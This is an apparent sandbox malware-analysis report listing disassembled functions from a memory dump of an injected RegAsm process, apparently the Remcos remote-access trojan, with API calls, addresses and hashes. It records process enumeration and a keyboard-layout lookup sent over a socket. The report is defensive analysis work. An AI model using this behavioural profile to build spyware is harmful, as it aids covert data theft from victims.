GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5

Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9

Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

_free.LIBCMT ref: 00444E06
_free.LIBCMT ref: 00444E1D
_free.LIBCMT ref: 00444E3C
_free.LIBCMT ref: 00444E57
_free.LIBCMT ref: 00444E6E

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88

Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 004493BD

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58

Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
CloseHandle.KERNEL32(00000000), ref: 0040FB05

Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2180151492-0
Opcode ID: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
Opcode Fuzzy Hash: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A

Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443E6B
_free.LIBCMT ref: 00443E8B

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84

Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
__alloca_probe_16.LIBCMT ref: 004511B1
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
__freea.LIBCMT ref: 0045121D

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94

Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 1000715C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F

Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
_free.LIBCMT ref: 100071B8
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0

Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044F363
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
_free.LIBCMT ref: 0044F3BF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9

Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
_free.LIBCMT ref: 10005BB4
_free.LIBCMT ref: 10005BDB
SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164

Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
_free.LIBCMT ref: 004482D3
_free.LIBCMT ref: 004482FA
SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D

Function 0041C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
CloseHandle.KERNEL32(00000000), ref: 0041C233
CloseHandle.KERNEL32(00000000), ref: 0041C23B

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpen$FileImageName
String ID:
API String ID: 2951400881-0
Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679

Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
lstrcatW.KERNEL32(?,?), ref: 10001EAC
lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID:
API String ID: 493641738-0
Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5

Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 100091D0

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100091E2
_free.LIBCMT ref: 100091F4
_free.LIBCMT ref: 10009206
_free.LIBCMT ref: 10009218

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64

Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004509D4

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 004509E6
_free.LIBCMT ref: 004509F8
_free.LIBCMT ref: 00450A0A
_free.LIBCMT ref: 00450A1C

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C

Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1000536F

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 10005381
_free.LIBCMT ref: 10005394
_free.LIBCMT ref: 100053A5
_free.LIBCMT ref: 100053B6

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84

Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00444066

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00444078
_free.LIBCMT ref: 0044408B
_free.LIBCMT ref: 0044409C
_free.LIBCMT ref: 004440AD

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF

Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044E738
_free.LIBCMT ref: 0044E855

Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44

Strings

*?, xrefs: 0044E72C
., xrefs: 0044EA0C

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54

Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3

Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00164960,00000010), ref: 004048E0

Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

8.v, xrefs: 00409EFE
hnv, xrefs: 00409F48
NG, xrefs: 00409F33

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsend
String ID: 8.v$hnv$NG
API String ID: 1634807452-1713483009
Opcode ID: 088076c525a7ba9bbf1c882158874681771abc0c272c9025060a35700cc2cdc5
Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
Opcode Fuzzy Hash: 088076c525a7ba9bbf1c882158874681771abc0c272c9025060a35700cc2cdc5
Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649

Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3

Strings

`#D, xrefs: 00442400
`#D, xrefs: 004424ED

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
